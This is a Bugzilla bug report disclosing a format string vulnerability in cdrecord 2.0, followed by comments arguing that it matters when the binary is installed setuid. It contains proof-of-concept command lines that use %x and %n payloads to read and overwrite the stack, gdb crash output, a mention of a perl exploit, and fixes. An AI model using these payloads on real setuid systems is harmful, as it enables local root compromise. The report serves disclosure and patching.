From Bugzilla Helper: User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020929 Description of problem: ---------------------------------------------------------------------------- PACKAGE : cdrtools VERSION : 2.0 SUMMARY : Format String SEVERITY : local root exploit if suid (on several distros) DATE: : 2003-05-05 ---------------------------------------------------------------------------- Hi, i would inform you that there is a format string vulnerability in cdrecord 2.0 and in particular in libscg/scsiopen.c in line 273, i suppose: -------------------------------------------------------------- 271 if (scg__open(scgp, devname) <= 0) { 272 if (errs && scgp->errstr) >>>273 js_snprintf(errs, slen, scgp->errstr);<<<< 274 scg_sfree(scgp); 275 return ((SCSI *)0); 276 } _______________________________________________________ !------- W A R N I N G -----------! !--- this is an exploitable vulnerability! ---! !----------------------------------------------! Cdrecord is present in several distros as setuid program so this is a real security hole. e.g. $ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jrg Schilling scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x' devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x' scsibus: -2 target: -2 lun: -2 Warning: Open by 'devname' is unintentional and not supported. ./cdrecord: File o directory inesistente. Cannot open 'AAAABBBBCCCC|65bffff6743808b7c8ffffffff000fffffffe4141414142424242. Cannot open SCSI driver. ./cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you are root. as you can see th last %x refers to AAAABBBBCCC so i can use %n for overwriting. anything i want: e.g. i can find on the stack the location of the return address... let's say 0xbffcffcc: $./cdrecord dev=`printf "\xec\xed\xff\xbfBBBBCCCC|%%x%%x%%x%%x%%x%%x%%x%%x%%n"` c/int.c .....snip.... (core dump) $ gdb `which cdrecord` core -q ....snip... #0 0x3f in ?? () (gdb) bt #0 0x3f in ?? () #1 0x8065451 in scg_open () #2 0x8049a3b in main () ... so it's exploitable. Solutions: A. Updated package can be found on: ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz B. Replace line 273 of liscg/scsiopen.c with : js_snprintf(errs, slen, "%s", scgp->errstr); C. remove the suid bit with: chmod 755 `which cdrecord` Regards, Stefano Di Paola ------------------ Stefano Di Paola Software Engineer stefano.dipaola1<at>tin<dot>it st0r1e<at>libero<dot>com Version-Release number of selected component (if applicable): cdrecord-1.10-4 How reproducible: Always Steps to Reproduce: 1. Obtain exploit perl source from URL above. 2. Execute perl script. Actual Results: The program segfaults (possibly can run a shell instead). Additional info: Right now the exploit is geared towards Mandrake, but the offsets can be changed to run on redhat variants.
cdrecord is not distributed setuid on Red Hat Linux 7.1 - removing security status from this bug.
By default this is true, but does not make it a non-issue. Looking at the documentation for xcdroast-0.98a9-2 ( /usr/share/doc/xcdroast-0.98a9/README.nonroot ) "Beginning with the alpha7 it was possible to start X-CD-Roast as normal user. This is only possible by setting a bunch of permissions correctly - however X-CD-Roast itself does NOT need the suid-root bit, which is very good for the security-reasons. The suid-root bit is nevertheless required on cdrecord, cdda2wav, mkisofs and readcd. All these programs have special handling for this case and drop the root rights immediately after initialization." Then it goes on to explain how to set the SUID bit. So while it is not set by default, it can and probably will be set by many users wishing to burn cds without being root.
Cdrecord does not ship setuid by default just like the bind or apache packages don't setup their init scripts to start by default. However, this doesn't mean the users might not chose to do it. This is a real security problem IMO.